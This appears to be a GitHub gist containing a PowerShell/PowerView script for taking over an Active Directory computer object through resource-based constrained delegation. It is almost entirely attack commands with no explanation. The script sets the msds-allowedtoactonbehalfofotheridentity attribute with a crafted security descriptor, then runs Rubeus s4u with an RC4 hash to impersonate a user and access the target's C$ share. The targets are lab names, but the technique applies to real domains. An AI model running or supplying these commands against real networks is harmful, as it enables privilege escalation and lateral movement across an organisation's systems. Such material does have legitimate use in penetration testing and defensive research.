Instantly share code, notes, and snippets.

Embed
What would you like to do?
Resource-based Constrained Delegation ACL-based Computer Object Takeover
# the target computer object we're taking over
$TargetComputer = "primary.testlab.local"
# find targets with S4U2Self enabled
Get-DomainObject -LDAPFilter '(userAccountControl:1.2.840.113556.1.4.803:=16777216)' -Properties samaccountname,useraccountcontrol | fl
# get our attacker's SID (account with rights over the target)
$AttackerSID = Get-DomainUser attacker -Properties objectsid | Select -Expand objectsid
# verify the GenericWrite permissions on $TargetComputer
$ACE = Get-DomainObjectACL $TargetComputer | ?{$_.SecurityIdentifier -match $AttackerSID}
$ACE
ConvertFrom-SID $ACE.SecurityIdentifier
# the identity we control that we want to grant S4U access to the target
$S4UIdentity = "TESTLAB\constraineduser"
# translate the identity to a security identifier
$IdentitySID = ((New-Object -TypeName System.Security.Principal.NTAccount -ArgumentList $S4UIdentity).Translate([System.Security.Principal.SecurityIdentifier])).Value
# substitute the security identifier into the raw SDDL
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($IdentitySID))"
# get the binary bytes for the SDDL
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
# set new security descriptor for 'msds-allowedtoactonbehalfofotheridentity'
Get-DomainComputer $TargetComputer | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose
# check that the ACE added correctly
$RawBytes = Get-DomainComputer $TargetComputer -Properties 'msds-allowedtoactonbehalfofotheridentity' | select -expand msds-allowedtoactonbehalfofotheridentity
$Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0
$Descriptor.DiscretionaryAcl
ConvertFrom-SID $Descriptor.DiscretionaryAcl.SecurityIdentifier
# execute Rubeus' s4u process against $TargetComputer
whoami
dir \\primary.testlab.local\C$
Rubeus.exe s4u /user:constraineduser /rc4:2b576acbe6bcfda7294d6bd18041b8fe /impersonateuser:harmj0y /msdsspn:cifs/primary.testlab.local /ptt
dir \\primary.testlab.local\C$
# clear the 'msds-allowedtoactonbehalfofotheridentity' security descriptor out
Get-DomainComputer $TargetComputer | Set-DomainObject -Clear 'msds-allowedtoactonbehalfofotheridentity' -Verbose
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment